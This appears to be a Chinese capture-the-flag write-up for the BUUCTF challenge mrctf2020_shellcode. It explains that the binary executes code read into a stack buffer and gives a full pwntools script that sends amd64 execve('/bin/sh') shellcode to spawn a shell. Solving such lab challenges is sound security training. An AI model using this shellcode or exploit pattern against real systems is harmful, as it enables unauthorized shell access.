BUUCTF--mrctf2020_shellcode1

这是一题64位的shellocde题,没啥花招入门题。看下保护:


有可执行的段。接着我们看看IDA:


主函数中无法反汇编,那么我们直接看汇编代码。其实很简单,通过系统调用执行puts函数,然后执行read函数。


正在我想如何覆盖返回地址的时候,发现题目直接帮你搞好了。取buf的的地址(栈上)然后跳转到buf位置执行代码。那么我们直接通过read函数构造shellcode就完成了:

python 复制代码
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
io=process('./mrctf2020_shellcode')

shellcode = '''
    mov rbx,0x68732f6e69622f
    push rbx
    push rsp
    pop rdi
    xor esi,esi
    xor edx,edx
    push 0x3b
    pop rax
    syscall
'''


shellcode=asm(shellcode)

io.recvuntil("magic!")

io.sendline(shellcode)

io.interactive()
相关推荐
AI+程序员在路上4 分钟前
XML介绍及常用c及c++库
xml·c语言·c++
好吃的肘子25 分钟前
Elasticsearch架构原理
开发语言·算法·elasticsearch·架构·jenkins
guoguo052425 分钟前
vs2019及以后版本cmd指定编译环境文件的路径
c++
软行41 分钟前
LeetCode 每日一题 3341. 到达最后一个房间的最少时间 I + II
数据结构·c++·算法·leetcode·职场和发展
nlog3n1 小时前
Go语言交替打印问题及多种实现方法
开发语言·算法·golang
kaixin_learn_qt_ing1 小时前
Golang
开发语言·后端·golang
ddd...e_bug1 小时前
Shell和Bash介绍
开发语言·bash
代码AC不AC1 小时前
【C++】STL简介
c++·stl简介
C4程序员2 小时前
Java百度身份证识别接口实现【配置即用】
java·开发语言
unityのkiven2 小时前
C++中的虚表和虚表指针的原理和示例
开发语言·c++